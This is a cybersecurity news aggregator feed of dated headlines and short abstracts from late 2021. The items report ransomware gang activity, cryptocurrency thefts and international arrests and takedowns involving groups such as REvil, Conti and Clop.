Abstract A Romanian man accused of using ransomware to hack high-profile organizations and companies was arrested Monday as part of a joint operation between the Romanian National Police, the FBI, and Europol.

Cyberscoop

December 13, 2021

Ukraine arrests 51 for selling data of 300 million people in US, EU Full Text

Abstract Ukrainian law enforcement arrested 51 suspects believed to have been selling stolen personal data on hacking forums belonging to hundreds of millions worldwide, including Ukraine, the US, and Europe.

BleepingComputer

December 13, 2021

Police arrests ransomware affiliate behind high-profile attacks Full Text

Abstract Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors.

BleepingComputer

December 11, 2021

New ‘Karakurt’ cybercrime gang focuses on data theft and extortion Full Text

Abstract Accenture researchers detailed the activity of a new sophisticated cybercrime group, called Karakurt, behind recent cyberattacks. Accenture researchers detailed the activity of a sophisticated financially motivated threat actor called Karakurt. The activity...

Security Affairs

December 9, 2021

Canadian Ransomware Arrest Is a Meaningful Flex, Experts Say Full Text

Abstract U.S. and Canada charge Ottawa man for ransomware attacks, signaling that North America is no cybercriminal haven.

Threatpost

December 8, 2021

Canadian indicted for launching ransomware attacks on orgs in US, Canada Full Text

Abstract The FBI and Justice Department unsealed indictments today leveling a number of charges against 31-year-old Canadian Matthew Philbert for his alleged involvement in several ransomware attacks.

ZDNet

December 07, 2021

Alleged ransomware affiliate arrested for healthcare attacks Full Text

Abstract A 31-year old Canadian national has been charged in connection to ransomware attacks against organizations in the United States and Canada, a federal indictment unsealed today shows.

BleepingComputer

December 6, 2021

Cuba Ransomware Gang Hauls in $44M in Payouts Full Text

Abstract The gang is using a variety of tools and malware to carry out attacks in volume on critical sectors, the FBI warned.

Threatpost

December 06, 2021

Hackers Steal $200 Million Worth of Cryptocurrency Tokens from BitMart Exchange Full Text

Abstract Cryptocurrency trading platform BitMart has disclosed a "large-scale security breach" that it blamed on a stolen private key, resulting in the theft of more than $150 million in various cryptocurrencies. The breach is said to have impacted two of its hot wallets on the Ethereum (ETH) blockchain and the Binance smart chain (BSC). The company  noted  that the wallets carried only a "small percentage" of the assets." Hot wallets, as opposed to their cold counterparts, are connected to the internet and allow cryptocurrency owners to receive and send tokens. Blockchain security and data analytics company PeckShield  estimated  the total loss to be around $200 million, calling the whole chain of events as "Pretty straightforward: transfer-out, swap, and wash." "This security breach was mainly caused by a stolen private key that had two of our hot wallets compromised," BitMart's chief executive Sheldon Xia  said  in a series of tweets sent

The Hacker News

December 4, 2021

Cuba ransomware gang hacked 49 US critical infrastructure organizations Full Text

Abstract The FBI has revealed that the Cuba ransomware gang breached the networks of at least 49 US critical infrastructure organizations. A flash alert published by the FBI has reported that the Cuba ransomware gang breached the networks of at least 49 US critical...

Security Affairs

December 3, 2021

Hackers Steal $120 Million from Badger DeFi Platform Full Text

Abstract Hackers have stolen an estimated $120 million worth of Bitcoin and Ether assets from Badger, a decentralized finance (DeFi) platform that allows users to borrow, loan, and speculate on cryptocurrency price variations.

The Record

December 3, 2021

Threat actors stole $120 M in crypto from BadgerDAO DeFi platform Full Text

Abstract Threat actors stole $120 million in cryptocurrencies from multiple wallets connected to the decentralized finance platform BadgerDAO. Threat actors this week have hacked the decentralized finance platform BadgerDAO and have stolen $120.3 million in crypto...

Security Affairs

December 2, 2021

Europol arrested 1800 money mules as part of an anti-money-laundering operation Full Text

Abstract Europol identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7. Europol has identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering...

Security Affairs

December 1, 2021

Stealthy ‘WIRTE’ Gang Targets Middle Eastern Governments Full Text

Abstract Kaspersky researchers suspect that the cyberattackers may be a subgroup of the politically motivated, Palestine-focused Gaza Cybergang.

Threatpost

December 01, 2021

Bulletproof hosting founder imprisoned for helping cybercrime gangs Full Text

Abstract 34-year-old Russian Aleksandr Grichishkin, the founder of a bulletproof hosting service, was sentenced to 60 months in prison for allowing cybercrime gangs to use the platform in attacks targeting US financial institutions between 2008 to 2015.

BleepingComputer

December 1, 2021

European Money Mule Action leads to 1,803 arrests Full Text

Abstract This was the seventh iteration of the European Money Mule Action, or ‘EMMA’, which was established in 2016 on the initiative of Europol, Eurojust, and the European Banking Federation.

Europol

December 1, 2021

Ottawa’s French public school board paid hackers a ransom following cyberattack Full Text

Abstract Hackers had stolen approximately 75 GB worth of data about employees and some students and parents dating back to 2000 that was stored on a server at the board's main office.

CTV News

November 30, 2021

FBI seized $2.3M from affiliate of REvil, Gandcrab ransomware gangs Full Text

Abstract The FBI seized $2.2 million in August from a well-known REvil and GandCrab ransomware affiliate, according to court documents seen by BleepingComputer.

BleepingComputer

November 30, 2021

FBI seized $2.2M from affiliate of REvil, Gandcrab ransomware gangs Full Text

Abstract The FBI seized $2.2 million in August from a well-known REvil and GandCrab ransomware affiliate, according to court documents seen by BleepingComputer.

BleepingComputer

November 30, 2021

Cybercriminals Pose as Samsung Recruiters to Target South Korea Full Text

Abstract A report by Google revealed that Lazarus APT, the North Korean-linked cyberespionage group, impersonated Samsung recruiters to target South Korean security firms selling anti-malware solutions. The sent emails contain a malicious PDF that talks about recruiting. Hackers are innovating and putting m ... Read More

Cyware Alerts - Hacker News

November 29, 2021

Ransomware Operators Threaten to Leak 1.5TB of Supernus Pharmaceuticals Data Full Text

Abstract Biopharmaceutical company Supernus Pharmaceuticals last week confirmed it fell victim to a ransomware attack that resulted in a large amount of data being exfiltrated from its network.

Security Week

November 28, 2021

Interpol Arrests Over 1,000 Cyber Criminals From 20 Countries; Seizes $27 Million Full Text

Abstract A joint four-month operation coordinated by Interpol, the international criminal police organization, has culminated in the arrests of more than 1,000 cybercriminals and the recovery of $27 million in illicit proceeds. Codenamed " HAECHI-II ," the crackdown enabled law enforcement units from across 20 countries, as well as Hong Kong and Macao, close 1,660 cases alongside blocking 2,350 bank accounts linked to the fraudulent illicit funds amassed from a range of online financial crimes, such as romance scams, investment fraud, and money laundering associated with illegal online gambling. "The results of Operation HAECHI-II show that the surge in online financial crime generated by the COVID-19 pandemic shows no signs of waning,"  said  Interpol Secretary General Jürgen Stock in a press statement issued on November 26. The coordinated law enforcement probe took place over a period of four months, starting from June 2021 until September 2021, with ten new criminal

The Hacker News

November 27, 2021

HAEICHI-II: Interpol arrested +1,000 suspects linked to various cybercrimes Full Text

Abstract HAEICHI-II: Interpol arrested 1,003 individuals charged for several cybercrimes, including romance scams, investment frauds, and online money laundering. Interpol has coordinated an international operation, code-named Operation HAEICHI-II, that...

Security Affairs

November 26, 2021

Interpol arrests over 1,000 suspects linked to cyber crime Full Text

Abstract Interpol has coordinated the arrest of 1,003 individuals linked to various cyber-crimes such as romance scams, investment frauds, online money laundering, and illegal online gambling.

BleepingComputer

November 25, 2021

How cybercriminals adjusted their scams for Black Friday 2021 Full Text

Abstract Black Friday is approaching, and while shoppers prepare to open their wallets, cybercriminals hone their malware droppers, phishing lures, and fake sites.

BleepingComputer

November 24, 2021

Suspect arrested in ‘ransom your employer’ criminal scheme Full Text

Abstract The emails offered a 40% cut of an anticipated $2.5 million ransomware payment in Bitcoin (BTC), made after the recipients installed the DemonWare ransomware on their employer's systems.

ZDNet

November 21, 2021

Researchers were able to access the payment portal of the Conti gang Full Text

Abstract The Conti ransomware group has suffered a data breach that exposed its attack infrastructure and allowed researcher to access it. Researchers at security firm Prodaft were able to identify the real IP address of one of the servers used by the Conti...

Security Affairs

November 20, 2021

The newer cybercrime triad: TrickBot-Emotet-Conti Full Text

Abstract Advanced Intelligence researchers argue that the restarting of the Emotet botnet was driven by Conti ransomware gang. Early this year, law enforcement and judicial authorities worldwide conducted a joint operation, named Operation Ladybird, which...

Security Affairs

November 20, 2021

Cybercriminals discuss new business model for zero-day exploits Full Text

Abstract The potential new service is a product of the highly profitable zero-day market, where researchers have seen multimillion-dollar price tags for vulnerabilities and exploits.

Tech Target

November 19, 2021

Canadian teenager stole $36 Million in cryptocurrency via SIM Swapping Full Text

Abstract A Canadian teen has been arrested for his alleged role in the theft of roughly $36.5 million worth of cryptocurrency. A Canadian teenager has been arrested for his alleged role in the theft of roughly $36.5 million worth of cryptocurrency from an American...

Security Affairs

November 19, 2021

Conti ransomware operations made at least $25.5 million since July 2021 Full Text

Abstract Researchers revealed that Conti ransomware operators earned at least $25.5 million from ransom payments since July 2021. A study conducted by Swiss security firm Prodaft with the support of blockchain analysis firm Elliptic revealed that the operators...

Security Affairs

November 18, 2021

Experts Expose Secrets of Conti Ransomware Group That Made 25 Million from Victims Full Text

Abstract The clearnet and dark web payment portals operated by the  Conti  ransomware group have gone down in what appears to be an attempt to shift to new infrastructure after details about the gang's inner workings and its members were made public. According to  MalwareHunterTeam , "while both the clearweb and Tor domains of the leak site of the Conti ransomware gang is online and working, both their clearweb and Tor domains for the payment site (which is obviously more important than the leak) is down." It's not clear what prompted the shutdown, but the development comes as Swiss cybersecurity firm PRODAFT  offered  an unprecedented look into the group's ransomware-as-a-service (RaaS) model, wherein the developers sell or lease their ransomware technology to affiliates hired from darknet forums, who then carry out attacks on their behalf while also netting about 70% of each ransom payment extorted from the victims. The result? Three members of the Conti team have b

The Hacker News

November 17, 2021

Most SS7 exploit service providers on dark web are scammers Full Text

Abstract The existence of Signaling System 7 (SS7) mobile telephony protocol vulnerabilities is something security researchers warned about in 2016, and it only took a year before the first attacks exploiting them were observed.

BleepingComputer

November 17, 2021

Russian ransomware gangs start collaborating with Chinese hackers Full Text

Abstract ​There's some unusual activity brewing on Russian-speaking cybercrime forums, where hackers appear to be reaching out to Chinese counterparts for collaboration.

BleepingComputer

November 17, 2021

The rise of millionaire zero-day exploit markets Full Text

Abstract Researchers detailed the multi-millionaire market of zero-day exploits, a parallel economy that is fueling the threat landscape. Zero-day exploits are essential weapons in the arsenal of nation-state actors and cybercrime groups. The increased demand...

Security Affairs

November 17, 2021

Mandiant links Ghostwriter operations to Belarus Full Text

Abstract Security researchers at the Mandiant Threat Intelligence team believe that Ghostwriter APT group is linked to the government of Belarus. Mandiant Threat Intelligence researchers believe that the Ghostwriter disinformation campaign (aka UNC1151) was linked...

Security Affairs

November 16, 2021

FBI Email Hoaxer ID’ed by the Guy He Allegedly Loves to Torment Full Text

Abstract Vinny Troia, the cybersecurity researcher mentioned in a fake alert gushed out of the FBI’s email system, says it’s just one of a string of jabs from a childish but cybercriminally talented tormentor.

Threatpost

November 16, 2021

REvil Is Down—For Now Full Text

Abstract What can be learned from the operations that got them to shut down?

Lawfare

November 16, 2021

Group behind cyberattacks on multiple governments linked to Belarus Full Text

Abstract Hacking and disinformation groups believed to be behind attacks on governmental agencies in countries including Germany in recent months were linked by cybersecurity researchers on Tuesday to the Belarusian government.

The Hill

November 15, 2021

Magniber is Now Exploiting Internet Explorer Flaws Full Text

Abstract The Mаgniber rаnsomwаre group has updated its attack method and has been exploiting two Internet Explorer (IE) vulnerаbilities. Moreover, the group is employing mаlicious ads to infect users аnd encrypt devices.

Cyware Alerts - Hacker News

November 15, 2021

Ransomware experts question massive Pysa/Mespinoza victim dump Full Text

Abstract The Pysa ransomware group dumped dozens of victims onto their leak site this week right after US law enforcement officials announced a range of actions taken against ransomware groups.

ZDNet

November 12, 2021

Threat from Organized Cybercrime Syndicates Is Rising Full Text

Abstract Europol reports that criminal groups are undermining the EU’s economy and its society, offering everything from murder-for-hire to kidnapping, torture and mutilation.

Threatpost

November 12, 2021

Trickbot and TA551 Are Buddies Full Text

Abstract A connection was established between the TrickBot gang and the TA551 threat group as a major similarity was found in their tools and TTPs. They use Bazabackdoor and deploy the Cobalt Strike beacon on the compromised system and add scheduled tasks for persistence. The recent collaborations prove h ... Read More

Cyware Alerts - Hacker News

November 11, 2021

Magniber ransomware gang now exploits Internet Explorer flaws in attacks Full Text

Abstract The Magniber ransomware gang is now using two Internet Explorer vulnerabilities and malicious advertisements to infect users and encrypt their devices.

BleepingComputer

November 10, 2021

TrickBot Gang Partners with TA551 Group to Deliver Conti Ransomware Full Text

Abstract The ITG23 group is partnering with TA551 (Shatak) threat group to distribute ITG23’s TrickBot and BazarBackdoor malware, which malicious actors use to deploy Conti ransomware on compromised systems.

Security Boulevard

November 9, 2021

International law enforcement arrested REvil ransomware affiliates in Romania and Kuwait Full Text

Abstract Romanian police arrested two alleged Sodinokibi/REvil ransomware affiliates accused to have orchestrated attacks against thousands of victims. Romanian law enforcement agencies have arrested two alleged Sodinokibi/REvil ransomware affiliates on November...

Security Affairs

November 9, 2021

US DoS offers a reward of up to $10M for leaders of REvil ransomware gang Full Text

Abstract The U.S. government offers up to $10 million for identifying or locating leaders in the REvil/Sodinokibi ransomware operation The Department of State offers up to $10 million for information that can lead to the identification or location of individuals...

Security Affairs

November 09, 2021

Clop gang exploiting SolarWinds Serv-U flaw in ransomware attacks Full Text

Abstract The Clop ransomware gang, also tracked as TA505 and FIN11, is exploiting a SolarWinds Serv-U vulnerability to breach corporate networks and ultimately encrypt its devices.

BleepingComputer

November 08, 2021

Suspected REvil Ransomware Affiliates Arrested in Global Takedown Full Text

Abstract Romanian law enforcement authorities have  announced  the arrest of two individuals for their roles as affiliates of the REvil ransomware family, dealing a severe blow to one of the most prolific cybercrime gangs in history. The suspects are believed to have  orchestrated  more than 5,000 ransomware attacks and extorted close to $600,000 from victims, according to Europol. The arrests, which happened on November 4, are part of a coordinated operation called GoldDust , which has resulted in the arrest of three other REvil affiliates and two suspects connected to GandCrab in Kuwait and South Korea since February 2021. This also includes a 22-year-old Ukrainian national, Yaroslav Vasinskyi, who was arrested in early October and has been accused of perpetrating the  devastating attack  on Florida-based software firm Kaseya in July 2021, affecting up to 1,500 downstream businesses. In all, the seven suspects linked to the two ransomware families are said to have targeted about 7,000 vic

The Hacker News

November 8, 2021

REvil Affiliates Arrested; DOJ Seizes $6.1M in Ransom Full Text

Abstract The U.S. is seeking the extradition of a Ukrainian man, Yaroslav Vasinskyi, whom they suspect is behind the Kaseya supply-chain attacks and other REvil attacks.

Threatpost

November 08, 2021

U.S. offers $10 million reward for leaders of REvil ransomware Full Text

Abstract The U.S. is offering up to $10 million for identifying or locating leaders in the REvil (Sodinokibi) ransomware operation, including $5 million leading to the arrest of affiliates.

BleepingComputer

November 8, 2021

Operation Cyclone targets Clop Ransomware affiliates Full Text

Abstract Operation Cyclone - Six alleged affiliates with the Clop ransomware operation were arrested in an international joint law enforcement operation led by Interpol. Interpol announced the arrest of six alleged affiliates with the Clop ransomware operation...

Security Affairs

November 08, 2021

US seizes $6 million from REvil ransomware, arrest Kaseya hacker Full Text

Abstract The United States Department of Justice today has announced charges against a REvil ransomware affiliate responsible for the attack against the Kaseya MSP platform on July 2nd and seizing more than $6 million from another REvil partner.

BleepingComputer

November 8, 2021

BlackMatter is Shutting Down - Is This Really Happening? Full Text

Abstract BlackMatter has gained a huge amount of notoriety in a short span of time but its time in the underworld has apparently come to an end, or so its operators say.

Cyware Alerts - Hacker News

November 08, 2021

Criminal group dismantled after forcing victims to be money mules Full Text

Abstract The Spanish police have arrested 45 people who are believed to be members of an online fraud group that operated twenty websites to defraud at least 200 people of 1,500,000 Euros ($1.73 million).

BleepingComputer

November 08, 2021

REvil ransomware affiliates arrested in Romania and Kuwait Full Text

Abstract Romanian law enforcement authorities have arrested two suspects believed to be Sodinokibi/REvil ransomware affiliates, allegedly responsible for infecting thousands of victims.

BleepingComputer

November 07, 2021

Operation Cyclone deals blow to Clop ransomware operation Full Text

Abstract A thirty-month international law enforcement operation codenamed 'Operation Cyclone' targeted the Clop ransomware gang, leading to the previously reported arrests of six members in Ukraine.

BleepingComputer

November 05, 2021

U.S. Offers $10 Million Reward for Information on DarkSide Ransomware Group Full Text

Abstract The U.S. government on Thursday announced a $10 million reward for information that may lead to the identification or location of key individuals who hold leadership positions in the DarkSide ransomware group or any of its rebrands. On top of that, the State Department is offering bounties of up to $5 million for intel and tip-offs that could result in the arrest and/or conviction in any country of individuals who are conspiring or attempting to participate in intrusions affiliated with the transnational organized crime syndicate. "In offering this reward, the United States demonstrates its commitment to protecting ransomware victims around the world from exploitation by cyber criminals," the State Department  said  in a statement. "The United States looks to nations who harbor ransomware criminals that are willing to bring justice for those victim businesses and organizations affected by ransomware." The development comes in response to DarkSide's high-pr

The Hacker News

November 04, 2021

Top DOJ official predicting more arrests in crackdown on ransomware, cyber crime Full Text

Abstract Deputy Attorney General Lisa Monaco said the U.S. should expect to see a crackdown on ransomware attacks and cyber crime as the Department of Justice (DOJ) ramps up its efforts in the area.

The Hill

November 04, 2021

Lockean multi-ransomware affiliates linked to attacks on French orgs Full Text

Abstract Details about the tools and tactics used by a ransomware affiliate group, now tracked as Lockean, have emerged today in a report from France's Computer Emergency Response Team (CERT).

BleepingComputer

November 3, 2021

Report: BlackMatter Ransomware Gang Goes Dark, Again Full Text

Abstract The former DarkSide cybercriminal group will shut down due to increased pressure from authorities, who may have nabbed a key team member.

Threatpost

November 3, 2021

Cybercrime underground flooded with offers for initial access to shipping and logistics orgs Full Text

Abstract Experts warn of the availability in the cybercrime underground of offers for initial access to networks of players in global supply chains. Researchers from threat intelligence firm Intel 471 published an analysis of current cybercrime underground...

Security Affairs

November 3, 2021

BlackMatter ransomware gang is shutting down due to pressure from law enforcement Full Text

Abstract The BlackMatter ransomware gang announced it is going to shut down its operation due to pressure from law enforcement. The BlackMatter ransomware group has announced it is shutting down its operation due to the pressure from local authorities. The...

Security Affairs

November 2, 2021

Ransomware Gangs Target Corporate Financial Activities Full Text

Abstract The FBI is warning about a fresh extortion tactic: threatening to tank share prices for publicly held companies.

Threatpost

November 2, 2021

Ransomware gangs target companies involved in time-sensitive financial events, FBI warns Full Text

Abstract The FBI warns of ransomware attacks on businesses involved in "time-sensitive financial events" such as corporate mergers and acquisitions. The Federal Bureau of Investigation (FBI) published a new private industry notification (PIN) to warn organizations...

Security Affairs

October 31, 2021

TA575 is Using Squid Game Lures to Drop Dridex Full Text

Abstract Proofpoint stumbled across a cybercrime actor, TA575, sending thousands of Squid Game phishing lures aimed at multiple industries primarily in the U.S. The group sends thousands of emails in every single campaign aimed at hundreds of organizations. Users are advised not to believe anything on the ... Read More

Cyware Alerts - Hacker News

October 29, 2021

Police arrest hackers behind over 1,800 ransomware attacks Full Text

Abstract The Europol has announced the arrest of 12 individuals who are believed to be linked to ransomware attacks against 1,800 victims in 71 countries.

BleepingComputer

October 29, 2021

Russian TrickBot Gang Hacker Extradited to U.S. Charged with Cybercrime Full Text

Abstract A Russian national, who was arrested in South Korea last month and extradited to the U.S. on October 20, appeared in a federal court in the state of Ohio on Thursday to face charges for his alleged role as a member of the infamous TrickBot group. Court documents showed that Vladimir Dunaev , 28, along with other members of the transnational, cybercriminal organization, stole money and confidential information from unsuspecting victims, including individuals, financial institutions, school districts, utility companies, government entities, and private businesses. Starting its roots as a banking trojan in 2016, TrickBot has  evolved  into a modular, multi-stage Windows-based crimeware solution capable of pilfering valuable personal and financial information, and even dropping ransomware and post-exploitation toolkits on compromised devices. The malware is also  notorious  for its  resilience , having survived at least two takedowns spearheaded by Microsoft and the U.S. Cyber Command

The Hacker News

October 28, 2021

Ransomware gangs use SEO poisoning to infect visitors Full Text

Abstract Researchers have spotted two campaigns linked to either the REvil ransomware gang or the SolarMarker backdoor that use SEO poisoning to serve payloads to targets.

BleepingComputer

October 28, 2021

German investigators identify REvil ransomware gang core member Full Text

Abstract German investigators have reportedly identified a Russian man named Nikolay K. whom they believe to be one of REvil ransomware gang's core members, one of the most notorious and successful ransomware groups in recent years.

BleepingComputer

October 27, 2021

NRA: No comment on Russian ransomware gang attack claims Full Text

Abstract The Grief ransomware gang claims to have attacked the National Rifle Association (NRA) and released allegedly stolen data as proof of the attack.

BleepingComputer

October 27, 2021

Grief ransomware gang hit US National Rifle Association (NRA) Full Text

Abstract Grief ransomware operators claim to have compromised computer systems at US National Rifle Association (NRA) and added it to their leak site. Grief ransomware operators announced to have hacked US National Rifle Association (NRA) and threaten to leak...

Security Affairs

October 27, 2021

Hackers arrested for ‘infiltrating’ Ukraine’s health database Full Text

Abstract The Security Service of Ukraine (SSU) has arrested a team of actors who illegally infiltrated the information system of the National Health Service of Ukraine (NHSU) and entered false vaccination entries for other people.

BleepingComputer

October 26, 2021

Dark HunTOR: Police arrested 150 people in dark web drug bust Full Text

Abstract Dark HunTOR: Police corps across the world have arrested 150 individuals suspected of buying or selling illicit goods on the dark web marketplace DarkMarket. A joint international operation, tracked as Dark HunTOR, conducted by law enforcement across...

Security Affairs

October 26, 2021

Police arrest 150 dark web vendors of illegal drugs and guns Full Text

Abstract Law enforcement authorities arrested 150 suspects allegedly involved in selling and buying illicit goods on DarkMarket, the largest illegal marketplace on the dark web when it was taken down in January 2021.

BleepingComputer

October 26, 2021

Money launderers for Russian hacking groups arrested in Ukraine Full Text

Abstract The Ukrainian cybercrime police force has arrested members of a group of money launderers and hackers at the request of U.S. intelligence services. 

BleepingComputer

October 25, 2021

Unknown ransomware gang uses SQL injection bug in BillQuick Web Suite to deploy ransomware Full Text

Abstract An unknown ransomware gang leverages a critical SQL injection flaw in the BillQuick Web Suite time and billing solution to deploy ransomware. An unknown ransomware gang is exploiting a critical SQL injection flaw, tracked as CVE-2021-42258, in the popular...

Security Affairs

October 25, 2021

Microsoft: Russian SVR hacked at least 14 IT supply chain firms since May Full Text

Abstract Microsoft says the Russian-backed Nobelium threat group behind last year's SolarWinds hack is still targeting the global IT supply chain, with 140 resellers and technology service providers attacked and at least 14 breached since May 2021.

BleepingComputer

October 25, 2021

Threat Actors Sell 50 Million Records of Moscow Drivers on Hacking Forum Full Text

Abstract Threat actors are selling a database containing 50 million records of Moscow drivers on an underground forum for only $800. The data contains records collected between 2006 and 2019.

Security Affairs

October 24, 2021

Ransomware Gangs Earned $590 Million in H1 2021 Full Text

Abstract Almost $5.2 billion worth of outgoing Bitcoin transactions have been observed by FinCEN. This amount is possibly linked to the top 10 most reported ransomware strains. 

Cyware Alerts - Hacker News

October 24, 2021

Threat actors offer for sale data for 50 millions of Moscow drivers Full Text

Abstract Threat actors are offering for sale a database containing 50 million records belonging to Moscow drivers on a hacking forum for $800. Bad news for Russian drivers, threat actors are selling a database containing 50 million records belonging to Moscow...

Security Affairs

October 23, 2021

Hacker sells the data for millions of Moscow drivers for $800 Full Text

Abstract Hackers are selling a stolen database containing 50 million records of Moscow driver data on an underground forum for only $800.

BleepingComputer

October 23, 2021

Ransomware hackers nervous, allege harassment from U.S. Full Text

Abstract Several ransomware gangs posted lengthy anti-U.S. screeds. They appear prompted by the news that the FBI had successfully hacked and taken down another major ransomware group called REvil.

NBC News

October 23, 2021

Feds Reportedly Hacked REvil Ransomware Group and Forced it Offline Full Text

Abstract The Russian-led REvil ransomware gang was felled by an active multi-country law enforcement operation that resulted in its infrastructure being hacked and  taken offline  for a second time earlier this week, in what's the  latest action  taken by governments to disrupt the lucrative ecosystem. The takedown was first reported by  Reuters , quoting multiple private-sector cyber experts working with the U.S. government, noting that the  May cyber attack  on Colonial Pipeline relied on encryption software developed by REvil associates, officially corroborating DarkSide's  connections  to the prolific criminal outfit. Coinciding with the development, blockchain analytics firm Elliptic  disclosed  that $7 million in bitcoin held by the DarkSide ransomware group were moved through a series of new wallets, with a small fraction of the amount being transferred with each transfer to make the laundered money more difficult to track and  convert   the funds  into fiat currency through

The Hacker News

October 23, 2021

After Nation-State Hackers, Cybercriminals Also Add Sliver Pentest Tool to Arsenal Full Text

Abstract The cybercriminal group tracked as TA551 recently showed a significant change in tactics with the addition of the open-source pentest tool Sliver to its arsenal, according to cybersecurity firm Proofpoint.

Security Week

October 22, 2021

Groove ransomware group calls on other ransomware gangs to hit US public sector Full Text

Abstract Groove ransomware operators call on other ransomware groups to stop competing and join the forces to fight against the US. The Groove ransomware gang is calling on other ransomware groups to attack US public sector after a an operation of of law enforcement...

Security Affairs

October 22, 2021

DarkSide ransomware operators move 6.8M worth of Bitcoin after REvil shutdown Full Text

Abstract Darkside and BlackMatter ransomware operators have moved a large amount of their Bitcoin reserves after the recent shutdown of REvil's infrastructure. The gangs behind the Darkside and BlackMatter ransomware operations have moved 107 BTC ($6.8 million)...

Security Affairs

October 22, 2021

Groove ransomware calls on all extortion gangs to attack US interests Full Text

Abstract The Groove ransomware gang is calling on other extortion groups to attack US interests after law enforcement took down REvil's infrastructure last week.

BleepingComputer

October 22, 2021

FIN7 cybercrime gang creates fake cybersecurity firm to recruit pentesters for ransomware attacks Full Text

Abstract FIN7 hacking group created fake cybersecurity companies to hire experts and involve them in ransomware attacks tricking them of conducting a pentest. The FIN7 hacking group is attempting to enter in the ransomware business and is doing it with an interesting...

Security Affairs

October 22, 2021

DarkSide Ransomware Gang Moves Bitcoin Reserves After REvil Got Hit by Law Enforcement Action Full Text

Abstract The operators of the Darkside and BlackMatter ransomware strains have moved a large chunk of their Bitcoin reserves after news broke that REvil was hit by a law enforcement takedown.

The Record

October 21, 2021

Cybercriminals Exploit the Discord CDN to Deliver 27 Unique Types of Malware Full Text

Abstract Discord, a popular VoIP, instant messaging, and digital distribution platform used by 140 million people in 2021, is being abused by cybercriminals to deploy malware files.

Risk IQ

October 21, 2021

US, allied nations force REvil ransomware group offline: report Full Text

Abstract The United States and other nations earlier this week in a joint operation hacked and forced offline the REvil cyber criminal group, which has been linked to several major ransomware attacks this year.

The Hill

October 21, 2021

Hacking gang creates fake firm to hire pentesters for ransomware attacks Full Text

Abstract The FIN7 hacking group is attempting to join the highly profitable ransomware space by creating fake cybersecurity companies that conduct network attacks under the guise of pentesting.

BleepingComputer

October 21, 2021

Cybercrime matures as hackers are forced to work smarter Full Text

Abstract An analysis of 500 hacking incidents across a wide range of industries has revealed trends that characterize a maturity in the way hacking groups operate today.

BleepingComputer

October 21, 2021

Bulletproof hosting admins sentenced for helping cybercrime gangs Full Text

Abstract Two Eastern European men were sentenced to prison on Racketeer Influenced Corrupt Organization (RICO) charges for bulletproof hosting services used by multiple cybercrime operations to target US organizations.

BleepingComputer

October 20, 2021

Two Eastern Europeans Sentenced for Providing Bulletproof Hosting to Cyber Criminals Full Text

Abstract Two Eastern European nationals have been sentenced in the U.S. for offering "bulletproof hosting" services to cybercriminals, who used the technical infrastructure to distribute malware and attack financial institutions across the country between 2009 to 2015. Pavel Stassi, 30, of Estonia, and Aleksandr Shorodumov, 33, of Lithuania, have been each sentenced to 24 months and 48 months in prison, respectively, for their roles in the scheme. The development comes months after Stassi and Shorodumov, along with Aleksandr Grichishkin and Andrei Skvortsov of Russia,  pleaded guilty  to Racketeer Influenced Corrupt Organization (RICO) charges earlier this May. The U.S. Justice Department (DoJ) said the other two co-defendants, Grichishkin and Skvortsov, are pending sentencing and face a maximum penalty of 20 years in prison. Court documents showed that both the individuals worked as administrators for an unnamed bulletproof hosting service provider that rented out IP addresses,

The Hacker News

October 20, 2021

Cybercriminals Use Interactsh Tool for Vulnerability Validation Full Text

Abstract Unit 42 discovered hackers exploiting an open-source service called Interactsh; the tool generates desired domain names to help users test whether an exploit is successful. The tool allows anyone to generate specific URLs for testing on HTTP attempts and DNS queries, which help them test whet ... Read More

Cyware Alerts - Hacker News

October 20, 2021

REvil Disappears Once Again Full Text

Abstract The Tor payment portal and data leak site of REvil was sent to oblivion after an unknown hacker using the same private keys hijacked the group’s domains. This is the second time that REvil has shut down its operations. Still, organizations should stay protected from such threats by keeping a reliab ... Read More

Cyware Alerts - Hacker News

October 19, 2021

Feds Warn BlackMatter Ransomware Gang is Poised to Strike Full Text

Abstract An advisory by the CISA, FBI and NSA reveals hallmark tactics of and shares defense tips against the cybercriminal group that’s picked up where its predecessor DarkSide left off.

Threatpost

October 19, 2021

Analysis: Top Ransomware Gangs Targeting Healthcare Sector Full Text

Abstract Ransomware attacks are continuing to threaten the U.S. and global healthcare sectors, in part due to many entities' high dependency on legacy systems and lack of security resources, according to HC3.

Gov Info Security

October 19, 2021

LightBasin hacking group breaches 13 global telecoms in two years Full Text

Abstract A group of hackers that security researchers call LightBasin has been compromising mobile telecommunication systems across the world for the past five years.

BleepingComputer

October 19, 2021

New Karma ransomware group likely a Nemty rebrand Full Text

Abstract Threat analysts at Sentinel Labs have found evidence of the Karma ransomware being just another evolutionary step in the strain that started as JSWorm, became Nemty, then Nefilim, Fusion, Milihpen, and most recently, Gangbang.

BleepingComputer

October 18, 2021

REvil ransomware operation shuts down once again Full Text

Abstract It seems that the REvil ransomware operation has shut down once again after a threat actor has hijacked their Tor hidden service. The REvil ransomware gang has shut down its operation once again after a threat actor has hijacked their Tor leak site...

Security Affairs

October 17, 2021

REvil Ransomware Gang Goes Underground After Tor Sites Were Compromised Full Text

Abstract REvil, the notorious ransomware gang behind a string of cyberattacks in recent years, appears to have gone off the radar once again, a little over a month after the cybercrime group staged a surprise return following a two-month-long hiatus. The development, first  spotted  by Recorded Future's  Dmitry Smilyanets , comes after a member affiliated with the REvil operation posted on the XSS hacking forum that unidentified actors had taken control of the gang's Tor payment portal and data leak website. "The server was compromised and they were looking for me. To be precise, they deleted the path to my hidden service in the  torrc file  and raised their own so that I would (sic) go there. I checked on others - this was not. Good luck everyone, I'm off," user 0_neday said in the post. As of writing, it isn't clear exactly who was behind the compromise of REvil's servers, although it wouldn't be entirely surprising if law enforcement agencies played a r

The Hacker News

October 15, 2021

Russian cybercrime gang targets finance firms with stealthy macros Full Text

Abstract A new phishing campaign dubbed MirrorBlast is deploying weaponized Excel documents that are extremely difficult to detect to compromise financial service organizations

BleepingComputer

October 13, 2021

MyKings botnet operators already amassed at least $24 million Full Text

Abstract The MyKings botnet (aka Smominru or DarkCloud) is still alive and continues to spread, allowing its operators to make huge amounts of money. Avast Threat Labs researchers reported that the MyKings botnet (aka Smominru or DarkCloud) is still alive and...

Security Affairs

October 11, 2021

